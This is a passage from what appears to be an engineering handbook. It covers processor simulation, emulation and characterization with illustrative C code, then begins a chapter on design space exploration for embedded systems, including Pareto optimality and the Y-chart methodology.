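void scatter_f32(float *base, const float *src, const int *index, int n) {
    for (int i = 0; i < n; i++)
        base[index[i]] = src[i];
}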
The basic idea here is that a wide memory connected to the machine (for
example, through a 512-bit interface) may be constructed from narrower (for example,
32-bit wide) memory macros forming individually addressable sub-banks. In the
absence of sub-bank conflicts (no more than
one access per sub-bank), all sub-banks can be accessed in parallel even though the
data items comprising 512 bits could be at pseudo-random discontinuous addresses.
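A sketch of the conflict condition, assuming a 512-bit interface built from sixteen 32-bit sub-banks:

#include <stdint.h>

/* With sixteen 4-byte sub-banks, the bank index is the word address mod 16.
   A 16-lane gather completes in one pass only when all 16 lane addresses
   map to distinct bank indices; colliding lanes are serialized. */
static inline unsigned bank_of(uint32_t byte_addr) {
    return (byte_addr >> 2) & 0xF;
}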
We might further improve the performance by considering that DSP two is a
5-way VLIW machine, and we can perform loads, multiple MACs, and scatter in
parallel.
The most straightforward way of implementing the pseudo-code of section “Algorithms” is
to write the corresponding reference C code, give it to the compiler, and expect the
compiler to figure out that multiple iterations can be performed in parallel, with the
number of iterations reduced accordingly. This code is for illustrative purposes only;
in a real implementation, the programmer or compiler may optimize it further:
for (x = 0; x < W; x++) {
    /* compute corresponding position in source image (xs, ys) */
    float xs = a11*x + a12*y + a13;
}

will become:

for (x = 0; x < W/(N/2); x++) {
    xb_vecN_2xf32 vxs = a11*vx + a12*vy + a13;
}

Here all the vector operations are 512-bit operations, i.e., 16 32-bit floating-point
multiplies and adds.
In the first part (vectorization), a RISC-V vector compiler will have a similar
flow, but the second part, where a VLIW compiler schedules multiple operations
into one instruction, does not exist for RISC-V vectors unless the RISC-V vector
extension processor uses an underlying VLIW approach. More likely, a RISC-V
vector extension processor will use a scalar, in-order superscalar, or out-of-order
architecture extended with vector operations; if it is capable of executing more than
one instruction in parallel, the schedule will be determined dynamically by the
machine’s hardware at runtime.
Different algorithms and their reference C implementations present different
degrees of difficulty for auto-vectorization by the compiler. In many cases,
auto-vectorization will fail.
The causes of the compiler’s failure to auto-vectorize may be divided into two
categories: dependencies genuinely inherent in the algorithm, and dependencies that
are merely apparent in the reference C code (for example, possible pointer aliasing)
which the compiler cannot rule out. In the latter case, the programmer can rewrite
the code explicitly using vector data types and intrinsic operations, so that a scalar
multiplication such as a = b * c

will become:

xb_vecN_2xf32 a, b, c;
a = MULN_2XF32(b, c);
Custom Instructions
As was mentioned before, if the machine still does not meet the computational
requirements, custom instructions can be introduced to accelerate cycle perfor-
mance.
Looking at the pseudo-code of section “Algorithms,” we can see that bilinear
interpolation could be a candidate for a new operation.
Here is an example: the bilinear interpolation

t = tl + (tr-tl)*xsf;
b = bl + (br-bl)*xsf;
dstimg[x][y] = t + (b-t)*ysf;

rewritten with a fused linear-interpolation instruction now has one-third the number
of operations (assuming all variables are contained in registers, no spills, and
excluding the final store):

t = LININTERP(tl, tr, xsf);
b = LININTERP(bl, br, xsf);
dstimg[x][y] = LININTERP(t, b, ysf);
In this and the previous section, we have looked at using code as a way of predicting
processor performance in the real world while still at an early design stage. Once
the methodologies described here have produced an acceptable result, the processor
becomes a candidate processor. The next step will be to figure out the requirements
on the performance of the subsystem. This includes considering the performance
of higher-latency memories (L2, L3, etc.), the performance of the bus to which the
core is connected, and coherence and synchronization overheads in a multicore
subsystem. All of these need to be considered; a mistake in estimating performance
at this early stage is among the most expensive mistakes in a project.
Throughout the last two sections, we talked about running or executing code at
an early stage of a project to determine a processor’s capabilities or fit. At such an
early stage, silicon is not available; therefore, one needs some sort of simulator
to benchmark the code. A simulator can also provide more visibility into the
reasons for performance issues than actual hardware could. This is the subject of
the next section.
Processor Simulation
In this section, we will discuss commonly used modelling techniques underlying the
assessment of algorithm performance on a target processor architecture: simulation
and emulation to characterize processor functionality, performance, and efficiency.
These modelling techniques vary in speed, accuracy, and configurability; processor
exploration, design, and characterization often require multiple techniques and
associated tools, each at the right level of modelling abstraction for the stage at
hand.
Functional Simulation
Definition
Functional simulation of a processor simply models the functional behavior of
its instruction set architecture (ISA). It helps determine if the implementation
of a software program is functionally correct. It rarely encompasses any micro-
architectural features of the target processor. It merely emulates one instruction at a
time by computing the outputs for a given set of inputs. Every simulated instruction
is assumed to take one clock cycle to complete. Functional simulators are also quite
useful for early architectural simulation as they can generate instruction-level traces,
which typically have information that can be consumed by trace-based statistical
analysis tools.
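The heart of such a simulator is a simple interpret loop. A minimal sketch in C follows (the register-file size, helper functions, and fixed 4-byte instruction width are assumptions for illustration, not any particular product’s API):

#include <stdint.h>

typedef struct {
    uint32_t pc;
    uint32_t regs[32];
    uint8_t *mem;
} Cpu;

uint32_t fetch32(const uint8_t *mem, uint32_t pc);  /* assumed helper        */
void     execute(Cpu *cpu, uint32_t insn);          /* updates regs, mem, pc */

void run(Cpu *cpu, uint64_t max_insns) {
    for (uint64_t n = 0; n < max_insns; n++) {
        uint32_t insn = fetch32(cpu->mem, cpu->pc); /* fetch                   */
        cpu->pc += 4;                               /* assume fixed-width ISA  */
        execute(cpu, insn);                         /* decode and execute      */
        /* no timing model: each instruction is one notional cycle */
    }
}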
Profiling with a functional simulator can identify which portions of those programs
have the most impact on overall performance and thus serve as relevant portions
for detailed performance characterization.
For a given processor architecture, CPU time can be reduced by increasing the
clock speed, or lowering the CPI, or lowering the program’s instruction count, or
some combination of them. Applying this analysis to a set of programs with diverse
instruction mix (McCallum and Chua 1987) can be a useful exercise in estimating
relative performance differences among those programs even with simple functional
simulation-based performance models.
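This is the classic processor-performance relation; writing IC for the dynamic instruction count, CPI for cycles per instruction, and f for the clock frequency:

$$\text{CPU time} = \frac{IC \times CPI}{f}$$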
Careful data placement and access ordering can improve the locality of references
to minimize the time and power spent accessing data elements in memory.
As an example, for processor architectures that support simultaneous memory
access of multiple agents in the same cycle, a popular technique to improve
performance is the use of memory banking (Sudarsanam and Malik 1995).
Open-Source Simulators
Over the decades, the computer architecture community has developed and promoted
various functional simulators for industry-standard ISAs (MIPS, x86, Arm, RISC-V,
etc.) for education, academic research, and sometimes industry use.
To name a few, some of the well-known open-source simulators in use today
are SimpleScalar (Burger and Austin 1997), Gem5 (Binkert et al. 2011, Abudaqa
et al. 2018, Lowe-Power et al. 2020), QEMU (Qemu 2020), ESESC, and Spike
(https://github.com/riscv/riscv-isa-sim). Some of these simulators support multiple
ISAs, offer varying levels of configurability among supported CPU features, and
provide extensibility for custom instructions.
Commercial CPU vendors provide accompanying proprietary software
toolchains, which typically include functional ISA simulators, often bundled
with an integrated development environment (IDE), for easier evaluation and
use of their CPUs. For example, Cadence Tensilica offers TurboXim, a fast
functional simulator for the Xtensa ISA, which can be used to quickly simulate
target applications on Xtensa ISA, debug functional issues in the application, and
profile the application to gather micro-architecture agnostic performance metrics as
a first-order estimate of performance.
Cycle-Level Simulation
Definition
A more accurate measure of code performance on a target processor requires a
cycle-level simulation of that processor. While it is not strictly necessary for a cycle-
level simulator to also fully model the functionality of a processor or a feature,
most do, which also helps with more fine-grained functional debugging.
Cycle-level simulators are more accurate as they model micro-architectural details
of processor components. At the initial stages, standalone cycle-level models of
individual processor components may be adequate to estimate performance of those
components, but to achieve very high overall model accuracy, it may become
necessary to model interactions between those components at a cycle level, such as
interactions between the core pipeline, multiple branch predictors, and instruction
cache to accurately model a complex event.
Performance Analysis
Cycle-level simulators primarily track the number of cycles needed to execute an
instruction stream. They count pipeline stalls and replays, memory delays and
conflicts, and branch penalties, among other multi-cycle events, which results in
more accurate performance measurement at the cost of longer simulation time. A useful
optimization for long simulation time is the use of statistical sampling. A hybrid
simulation mode where an application is run in the cycle-level mode for a small
percentage of time and run in the fast-functional mode for most of the time can
yield a good balance between cycle-count accuracy and execution runtime.
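Schematically, such a hybrid run alternates between the two modes; the model handles and function names below are placeholders invented for this sketch, not a real simulator API:

/* Hybrid sampled simulation: functionally fast-forward between samples,
   warm up micro-architectural state, then measure a short window. */
typedef struct { long cycles, insns; } Stats;
int   workload_finished(void);
void  fast_forward(void *functional_model, long n);   /* no timing, fast     */
void  warm_up(void *cycle_model, long n);             /* caches, predictors  */
Stats run_cycle_accurate(void *cycle_model, long n);  /* measured window     */

void sampled_run(void *fm, void *cm, Stats *totals) {
    while (!workload_finished()) {
        fast_forward(fm, 100000000);        /* skip most instructions cheaply */
        warm_up(cm, 1000000);               /* rebuild cache/predictor state  */
        Stats s = run_cycle_accurate(cm, 10000000);
        totals->cycles += s.cycles;         /* extrapolate from samples later */
        totals->insns  += s.insns;
    }
}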
Optimization
With the aid of cycle-level models – standalone or integrated – it is feasible
to analyze application code more closely for performance bottlenecks. A basic
analysis may just be determining upper/lower bounds of code performance for a
given component or a processor configuration. The next stage of analysis could be
either changing the code itself to measure performance on a given configuration, or
changing the configuration to measure performance on a fixed piece of code (such as
a benchmark). Sometimes, depending on the available feature set of a processor and
the nature of the software algorithm, one may undertake data type precision analysis
to optimize the algorithm to achieve highest performance on the target processor.
It is often useful to also study how data placement in memory affects processor
performance and if the target processor allows for it, take advantage of features like
memory banking that allow concurrent memory accesses in the same cycle.
Configurability
An important characteristic of cycle-level models and simulators is the ability to
configure various attributes of processor components. Configurability enables rapid
design space exploration, model verification, and easy model extension to support
new features, which may be something as trivial as adding a new instruction to the
ISA. Simulator development always involves a trade-off between how much generality
to offer and modelling fixed configurations with a high level of accuracy.
Open-Source Simulators
There are several open-source cycle-level CPU instruction set simulators (listed
in “Open-Source Simulators”) used by students, researchers, and engineers. These
simulators often support multiple target architectures (such as Arm, SPARC, MIPS,
Intel PC, PowerPC, RISC-V, etc.), multiple CPU devices, and generally some degree
of configurability in the types of components being modelled. The nature of the
CPU configuration being modelled would largely determine the accuracy and speed
of any such simulator.
In addition, commercial CPU vendors often offer proprietary simulators for
cycle-level simulation of their processors. As an example, the Cadence Tensilica
Xtensa and Synopsys ARC processors come with proprietary simulators that support
the full degree of configurability offered by their platform to allow SoC architects
and software developers to analyze and optimize application code to the target
processor.
A further approach to cycle-level simulation is to use RTL or translated RTL
(Verilator). Arm provides Cycle Models of their CPUs, which are generated from
the IP configuration by their IP Exchange portal (ARM 2021).
Hardware Emulation
Definition
Hardware emulation is the process of modelling a certain hardware component (such
as a processor) purely in software or with different hardware. While simulators
model the functions of a piece of hardware, emulators, on the other hand, attempt
to also model the internal workings of that piece of hardware. Often, emulating new
hardware designs with existing hardware offers many advantages, including faster
program execution, more accurate functional verification, and in some cases, even
PPA estimation. Thus, hardware emulation may encompass software models such
as Qemu or hardware platforms such as Cadence Palladium, Synopsys Zebu, and
Mentor Veloce. A good discussion of hardware-assisted emulation platforms can be
found in Schirrmeister (2016).
Emulation Modes
There are various types of emulators or emulation modes based on the fidelity with
which they emulate a system. Application mode models just enough components
(CPU, memory, IO) to execute a workload. This model is often enough to measure
performance but does not simulate any OS. Full platform mode models a broader set
of components including network, disk, and other peripherals. Hybrid models use
software emulation components in conjunction with hardware models (FPGA). In
general, hardware emulators are meant to provide a highly accurate, stable, flexible,
and fast model for executing real application software on a piece of target hardware
that is being modelled on different hardware.
In Tensilica’s earlier proprietary system-modelling environment, XTMP, the
processor ISS, as discussed earlier, was generated to support the exact configuration
and extended ISA of the particular processor. To an almost complete extent,
the XTMP modelling approach was subsumed by a SystemC approach, XTSC,
that allowed much easier integration into open-source and third-party commercial
system modelling tools, so we will discuss only the SystemC-based approach here.
The processor models have many introspective model-query methods that permit
all the relevant characteristics of a particular configuration (for example, numbers
and types of memory interfaces) to be determined, which allows the dynamic
creation of integration wrappers for the processor models.
In addition, the interfaces supported include cycle-accurate transaction-level
interfaces, fast-functional transaction-level interfaces, and cycle-accurate pin-level
interfaces, which allow integration into several different types of system models.
The XTSC modelling environment also includes several generic device models
(e.g., memories, connectors, routers, DMA) that are configurable and allow the man-
ual construction of relatively complex system models for design space exploration.
XTSC supports several system simulation use models: single-processor simula-
tion with models of various external devices, including memories and peripheral
blocks; multiprocessor simulation with both Xtensa and other processors, complex
buses or networks-on-chip, and hardware accelerators; mixed system and HDL
simulation using pin-level transactors and interfaces to Verilog simulation of
hardware blocks; and virtual prototype simulation. All these use cases permit,
where supported, both cycle-accurate simulation and fast-functional (compiled
code) simulation.
The system modelling tools then support software development and functional
verification; system and software profiling; and debugging.
When used as a standalone SystemC-based modelling tool, XTSC supports many
utility functions that are otherwise offered in third-party environments, such as
logging, easy setup and integration, out-of-order simulation in fast-functional mode,
and direct memory access methods. Although developed prior to the SystemC TLM2
abstractions, it supports TLM2 using transaction adaptors.
The use of an industry standard such as SystemC allows easier integration of the
processor simulators into third party proprietary ESL system tools. Over the years,
such integrations have been done with CoWare, Virtio and VaST System Technology
(all acquired by Synopsys, and current integration with Synopsys virtual prototyping
tools Platform Architect Ultra and Virtualizer), Rockwell Semiconductor Maxsim
(that became a spinoff Axys Design Automation, then part of Arm, then part of
Carbon Design, and finally part of Arm again), Imperas (OVPSim), Virtutech Simics
(then part of Intel’s Wind River and then Wind River spun back out of Intel), and
Mirabilis. Some of these integrations are historical and not current, but they show
that use of SystemC XTSC instead of the earlier proprietary XTMP made integration
easier.
As noted earlier, Qemu (Bellard 2005, Qemu 2020) has been used for many years
to build instruction set simulator models for many different processor families –
including x86, Sparc, PowerPC, MIPS, Xtensa, and notably and recently, RISC-
V. It has then been integrated into many system or platform models (Lonardi and
Pravadelli 2014; Qemu System 2020) where models of peripherals and buses can
be combined with single or multiple processor models (possibly heterogeneous) to
produce system virtual prototype models that can be used as in the earlier discussion
for software development, functional verification, profiling, and debugging.
Some of the full chip platforms that have been built, as well as using the
processors cited earlier, include various Arm boards, Coldfire, PC emulators, IBM
mainframe emulators, and many more.
Examples
The methodologies discussed in this chapter have been applied over the years
to many different processors with ISAs drawn from several sources. Notable
among them are Synopsys ARC cores, Cadence Tensilica CPUs and DSPs, Ceva
processors, and RISC-V processors including academic research projects and
commercial offerings from providers such as Greenwaves, SiFive, Andes, Codasip,
and Syntacore. All these offerings allow some measure of ISA customization to
allow the cores to be tuned to particular application spaces, whether done by the
provider or the end user. In addition, standard offerings from Arm and the Intel x86
world give fixed ISA alternatives to the ability to customize an application-specific
instruction set processor (ASIP) (Ienne and Leupers 2007).
Applications targeted with these methodologies include wireless communica-
tions (Rowen et al. 2009; Rowen 2012; Heine 2016), vision processing (Rowen
2015), imaging and AI (Efland et al. 2016), cryptography (Marshall et al. 2020),
cryptography in vehicle-to-vehicle communications (Ogawa et al. 2019), and
advanced 64-bit math in a 32-bit RISC (Bit 2019).
This rich set of applications and the need to choose and possibly tune the ISA
reinforces the importance of the methodologies illustrated here. To illustrate more
deeply, we will summarize the design methodology used in Ogawa (2019). The
authors developed a design to better support cryptographic applications in vehicle-
to-vehicle communications. They went through a numbered sequence of steps, which
included designing APEX instruction extensions for the encryption and key schedule
operations and for the Galois Field multiplication. This was fairly intricate work;
the paper has appendices which provide details on the operations. The later steps
were:
10. To test the revised benchmark code (incorporating the instruction extensions
and the data layout directives), the authors used the Synopsys cycle-accurate
processor model. They used test vectors from various industry standards sites
for the cryptographic algorithms. PPA was estimated by targeting an FPGA
implementation of the resulting processor, although of course it could have
been implemented in an SoC. Details are given in the paper of the generated
DesignWare ARC xCAM cycle-accurate models, incorporating the APEX
instruction extensions.
11. The final measurements indicated that applying both the instruction extensions
and X-Y memory sped up the PRESENT block cipher application by 17 to 34
times, at a cost of 4% in FPGA LUTs and 8% in registers.
12. Similarly, for Galois Field multiplication, the Curve25519 algorithm sped up
by 2.5 times at a relatively low cost of 9% in FPGA LUTs, 15% in registers,
and a small number of DSP blocks and Carry8 primitives.
13. In their conclusion, they discuss that other extensible and configurable proces-
sors could have been the targets for this work, and the methodology approach
could be used with other cryptographic algorithms.
To summarize, the work in Ogawa (2019) is a very good illustration of the design
and methodology approaches discussed in this chapter in practical use.
Conclusion
In this chapter, we have discussed two orthogonal but related concepts: how to
simulate instruction set processors; and how to characterize them, using processor
simulators, in order to make choices as to what processor(s) to use for specific
design projects, and whether they will be standard off-the-shelf designs or will be
customized using a number of different possible approaches.
Characterizing processors can be done with standard benchmarks, application-
specific design code, or a suitable mixture of both. We have reviewed several of the
standard benchmarks used over the years and have given examples of how design
code may be used.
Finally, we have shown via examples of processor characterization how these
concepts can be applied to several interesting application areas.
References
Abudaqa AA, Al-Kharoubi TM, Mudawar MF, Kobilica A (2018) Simulation of ARM and x86
microprocessors using in-order and out-of-order CPU models with Gem5 simulator. In: 2018 5th
international conference on Electrical and Electronic Engineering (ICEEE), May 2018. IEEE,
Istanbul, Turkey, pp 317–322
Marshall B, Newell GR, Page D, Saarinen M, Wolf C (2020) The design of scalar AES instruction
set extensions for RISC-V. In: IACR transactions on cryptographic hardware and embedded
systems (TCHES). 2020
Martin G, Nedeljkovic N, Heine D (2010) Configurable, extensible processor system simulation.
In: Leupers R, Temam O (eds) Processor and System-on-Chip simulation. Springer, Heidelberg,
pp 293–308
The Mathworks (2020). http://www.mathworks.com. Accessed 5 Oct 2020
McCallum JC, Chua T (1987) A synthetic instruction mix for evaluating microprocessor perfor-
mance. IEEE Micro, May/June, 1987. pp 63–80
Mediatek (2020). https://www.mediatek.com/products/smartphones. Accessed 5 Oct 2020
Misra S, Alfa AA, Olaniyi MO, Adewale SO (2014) Exploratory study of techniques for exploiting
instruction-level parallelism. 2014 Global Summit on Computer & Information Technology
(GSCIT), Sousse, 2014, pp 1–6. https://doi.org/10.1109/GSCIT.2014.6970103
Ogawa H, Luther T, Ricardini J, Cunha H, Simplicio Jr M, Aranha D, Derwig R, Patil H (2019) Accelerated V2X provisioning with extensible processor platform. IACR Cryptol ePrint Arch 2019:1039
Patterson D (2020) Embench™: recruiting for the long overdue and deserved demise of Dhrystone as a benchmark for embedded computing. Computer Architecture Today. https://www.sigarch.org/embench-recruiting-for-the-long-overdue-and-deserved-demise-of-dhrystone-as-a-benchmark-for-embedded-computing/. Accessed 5 Oct 2020
Qualcomm (2020). https://www.qualcomm.com/products/application-processors. Accessed 5 Oct 2020
Qemu (2020). www.qemu.org. Accessed 5 Oct 2020
Qemu System Emulator Targets (2020). https://www.qemu.org/docs/master/system/targets.html. Accessed 5 Oct 2020
RISC-V International (2020). http://www.riscv.org. Accessed 5 Oct 2020
RISC-V International Exchange Cores and SoCs (2020). https://www.riscv.org/exchange/cores-socs/. Accessed 5 Oct 2020
Rowen C et al (2009) A DSP architecture optimised for wireless baseband. In: International
symposium on System-on-Chip. Tampere, Finland, 2009
Rowen C (2012) Power/performance breakthrough for LTE Advanced handsets. Linley Mobile Conference, Santa Clara, April 16, 2012
Rowen C (2015) Instruction set innovation in fourth generation vision DSPs, Linley Processor
Conference, Santa Clara, 2015
Schirrmeister F, Bershteyn M, Turner R (2016) Hardware-assisted verification and software
development. In: Scheffer L, Lavagno L, Markov I, Martin G (eds) The EDA handbook, Volume
I, chapter 19, 2nd edn. CRC Press/Taylor and Francis, Boca Raton
Sherwood T, Perelman E, Hamerly G, Calder B (2002) Automatically characterizing large
scale program behavior, ASPLOS X: Proceedings of the 10th international conference on
architectural support for programming languages and operating systems, San Jose, October
2002. pp 45–57. https://doi.org/10.1145/605397.605403
Standard Performance Evaluation Corporation [SPEC CPU] (2020). https://www.spec.org/
benchmarks.html. Accessed 5 Oct 2020
Sudarsanam A, Malik S (1995) Memory bank and register allocation in software synthesis for
ASIPs. In: Proceedings of IEEE international conference on Computer Aided Design (ICCAD),
San Jose, CA, USA, 1995, pp. 388–392. https://doi.org/10.1109/ICCAD.1995.480145
Synopsys ASIP Designer Web page (2021). https://www.synopsys.com/dw/ipdir.php?ds=asip-
designer
Weiss A (2002) Dhrystone benchmark: history, analysis, “scores” and recommendations. White paper, Embedded Microprocessor Benchmark Consortium (EEMBC). https://www.eembc.org/techlit/datasheets/dhrystone_wp.pdf. Accessed 5 Oct 2020
Wolberg G (1990) Digital image warping. Wiley-IEEE Computer Society Press, Los Alamitos
Methodologies for Design Space
Exploration 26
Andy D. Pimentel
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 916
DSE: The Basic Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 917
Two Basic Ingredients of DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 919
Y-Chart-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 920
Evaluation of a Single Design Point . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 922
Simulative Fitness Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 922
Analytical Fitness Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 926
Searching the Design Space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 927
GA-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 928
Optimizing GA-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 931
Multi-application Workload Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 932
Scenario-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 933
Application Exploration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 937
NAS by Means of Evolutionary Piecemeal Training (EPT) . . . . . . . . . . . . . . . . . . . . . . . . . 937
Conclusion and Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 940
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 942
Abstract
In this chapter, an overview of techniques and methods for the design space
exploration (DSE) of embedded systems is presented. DSE is the critical design
process in which system designs are modeled, evaluated, and, eventually, opti-
mized for the various extra-functional system behaviors, such as performance,
power or energy consumption, and cost. The discussion is organized along the
lines of the two primary elements of DSE, namely, the evaluation of single design
points and the search strategy for covering the design space.
A. D. Pimentel ()
Parallel Computing Systems Group, University of Amsterdam, Amsterdam, The Netherlands
e-mail: [email protected]
Introduction
Design space exploration (DSE) is a key ingredient of the design process because the considered design choices may heavily influence
the success or failure of the final product. However, the process of DSE also is
highly challenging since the design space that needs to be explored typically is
vast, especially during the early stages of design. For instance, the design space
for exploring different mappings of application tasks to processing resources – and
trying to optimize the mapping for, e.g., system performance or power consumption
– grows exponentially with the number of application tasks and processors in the
system and is known to be an NP-hard problem (Singh et al. 2013). Therefore,
the development of efficient and effective DSE methods has received significant
research attention in recent years. In this chapter, an overview will be provided of
the various aspects involved in DSE of embedded systems.
DSE: The Basic Concepts
At its core, DSE is a multi-objective optimization problem (MOP): each design point is described by m decision variables x1, . . . , xm and is evaluated by n fitness values yi that are computed with the objective functions

fi : R^m → R^1, 1 ≤ i ≤ n (1)
Fig. 1 The design space broken down into solution and objective space
Feasible solutions are those that satisfy all design constraints (e.g., using not more than the available number of processors, using a valid mapping of application tasks to processing resources, etc.), i.e., the xi are part of the so-called feasible set. In the remainder of this discussion, a minimization procedure is assumed; without loss of generality, a maximization problem can be converted into this minimization form by multiplying the fitness values yi by −1.
With an optimization of a single objective, the comparison of solutions is
trivial. A better fitness (i.e., objective value) means a better solution. With multiple
objectives, however, the comparison becomes nontrivial. Take, for example, two
different MPSoC designs: a high-performance MPSoC and a slower but much
cheaper one. In case there is no preference defined with respect to the objectives and there are also no restrictions on the objectives, one cannot say whether the high-performance MPSoC or the low-cost MPSoC is the better one. A MOP can have even more
different objectives, like the performance, energy consumption, cost, and reliability
of an MPSoC-based embedded system. To compare different solutions in the case of
multiple objectives, the Pareto dominance relation is generally used. Here, a solution
xa ∈ X is said to dominate solution xb ∈ X, written xa ≺ xb, if and only if

∀i ∈ {1, . . . , n} : fi(xa) ≤ fi(xb) and ∃i ∈ {1, . . . , n} : fi(xa) < fi(xb)

Fig. 2 An example two-objective (f1, f2) space with solutions A–N, in which solutions A–F form the Pareto front and the region of solutions that dominate H is indicated
As Fig. 2 shows, some of the solutions are not comparable to H. These solutions are better for one objective but worse for another.
The Pareto dominance relation only provides a partial ordering. For example,
the solutions A to F of the example in Fig. 2 cannot be ordered using the ordering
relation. Since not all solutions x ∈ X can be ordered, the result of a MOP is not a
single solution but a front of non-dominated solutions, called the Pareto front. A set X′ ⊆ X is defined to be the Pareto front of the set of solutions X as follows:

X′ = {x ∈ X | ∄ xa ∈ X : xa ≺ x}
The Pareto front of Fig. 2 contains six solutions: A–F. None of these solutions dominates another: an improvement on objective f1 is matched by a worse value for f2. Generally, it is up to the designer to decide which of these solutions provides the best trade-off.
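In code, the dominance relation and the extraction of the Pareto front take only a few lines. The following Python sketch assumes minimization of all objectives; the (time, cost) values are purely illustrative:

```python
from typing import List, Sequence

def dominates(ya: Sequence[float], yb: Sequence[float]) -> bool:
    """True iff fitness vector ya Pareto-dominates yb (minimization)."""
    return (all(a <= b for a, b in zip(ya, yb))
            and any(a < b for a, b in zip(ya, yb)))

def pareto_front(points: List[Sequence[float]]) -> List[Sequence[float]]:
    """Return the non-dominated subset of a list of fitness vectors."""
    return [p for p in points
            if not any(dominates(q, p) for q in points if q is not p)]

# Illustrative (execution time, cost) values for four MPSoC designs:
designs = [(1.0, 9.0), (4.0, 3.0), (5.0, 5.0), (2.0, 8.0)]
print(pareto_front(designs))  # (5.0, 5.0) is dominated by (4.0, 3.0)
```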
Two Basic Ingredients of DSE
The search for Pareto optimal design points with respect to multiple design criteria
as targeted by DSE entails two distinct elements (Gries 2004; Pimentel 2017):
1. The evaluation of a single design point using the fitness function(s) regarding all
the objectives in question like system performance, power/energy consumption,
and so on
2. The search strategy for covering and navigating through the design space,
spanned by the decision variables xi (with 1 ≤ i ≤ m), during the DSE process
Figure 3 shows a simple taxonomy for DSE approaches, recognizing the above two
DSE elements as well as different properties of these DSE elements. Please note
that these properties typically cannot be considered in pure isolation as they can be
interdependent and even conflicting with each other. As will be discussed in more
Fig. 3 A simple taxonomy of DSE elements and their (interdependent) properties: accuracy (capturing relevant system properties), speed (evaluation execution time), and effort for the evaluation of single design points; confidence (reliability of result quality), convergence (speed towards optimum results), and effort for the search strategy
detail later on, there usually exists a trade-off between the accuracy and speed with
which the fitness of single design points can be evaluated. In addition to this, the
various fitness evaluation techniques also differ with respect to the implementation
effort and the capability of evaluating the fitness for a wide range of systems,
involving issues such as modularity, reusability of models, etc.
Regarding the search strategy aspect of DSE, the confidence property denotes
the degree of certainty that the design points returned by the DSE include the true
optimum or, alternatively, how close they are to the true optimum. In many search
algorithms, confidence is obtained by avoiding local optima and ensuring sufficient
design space coverage. Clearly, an exhaustive search in which every single point
in the design space is evaluated and compared would provide 100% confidence. However, such an exhaustive search is usually prohibitive due to the sheer size of the
design space. In those cases, as will be discussed later on, search techniques based
on metaheuristics can be used to search the design space for optimal solutions using
only a finite number of design point evaluations. The convergence property denotes
the speed of evaluating a range of design points and, more specifically, the rate
at which the DSE search algorithm manages to converge to an optimum. Finally,
analogous with the effort property in the case of evaluating a single design point,
the effort for searching the design space refers to the implementation of the search
method and setting its parameters, as well as setting up, running, and evaluating the
results of the exploration experiment.
Y-Chart-Based DSE
Many system-level fitness evaluation and DSE methods and tools in the embedded
systems domain are based on the Y-chart methodology (Kienhuis et al. 2002;
Balarin et al. 1997), which is illustrated in Fig. 4. This implies that these DSE
methods separate application models (or workload models) and architecture models
Fig. 4 The Y-chart methodology: application models from an application domain are mapped onto a (platform) architecture model, after which fitness analysis yields fitness numbers
while also recognizing an explicit mapping step to map application tasks onto
architecture resources (i.e., bind tasks to processing elements in space and time). In
this approach, an application model – derived from a specific application domain
– describes the functional behavior of an application workload in a timing and
architecture independent manner. An MPSoC (platform) architecture model – which
usually has been defined with the application domain in mind – defines architecture
resources and captures their extra-functional behavior, i.e., behavior in terms of
performance, power consumption, cost, etc. To perform quantitative analysis of
the fitness of a design point, application models are mapped onto the architecture
model under investigation, after which the fitness of each application-architecture
combination can be evaluated. Subsequently, the resulting fitness numbers may
be used by the search algorithm of a DSE process to change the architecture,
restructure/adapt the application(s), or modify the mapping of the application(s).
These actions are illustrated by the light bulbs in Fig. 4.
Essential in this methodology is that an application model is independent from
architectural specifics, assumptions on hardware/software partitioning, and timing
characteristics. As a result, application models can be reused in the exploration
cycle. For example, a single-application model can be used to exercise different
hardware/software partitionings or can be mapped onto a range of architecture
models, possibly representing different MPSoC architecture designs or modeling
the same architecture design at various levels of abstraction. The latter refers to the
gradual refinement of architecture models (e.g., Pimentel et al. 2006; Thompson
et al. 2006). As design decisions are made, a designer typically wants to descend
in abstraction level by disclosing more and more implementation details in an
architecture model. Eventually, such refinement can bring an initially abstract architecture model down to a level that is close to the actual implementation.
Evaluation of a Single Design Point
Methods for evaluating the fitness of a single design point in the design space
roughly fall into one of three categories: (1) measurements on a (prototype)
implementation, (2) simulation-based evaluations, and (3) estimations based on an
analytical model. Each of these methods has different properties with regard to
evaluation time and accuracy. Evaluation of prototype implementations provides
the highest accuracy, but long development times prohibit evaluation of many
design options. Analytical estimations are considered the fastest, but accuracy is
limited since they are typically unable to sufficiently capture particular intricate
system behavior. Simulation-based evaluation fills up the range in between these
two extremes: both highly accurate (but slower) and fast (but less accurate)
simulation techniques are available (see also Chap. 25, “Processor Simulation and
Characterization”). This trade-off between accuracy and speed is very important,
since successful DSE depends both on the ability to evaluate a single design point
and being able to efficiently search the entire design space. As present DSE efforts in
the domain of embedded systems design usually use simulation or analytical models
to evaluate single design points, the remainder of this section will focus on these
methods.
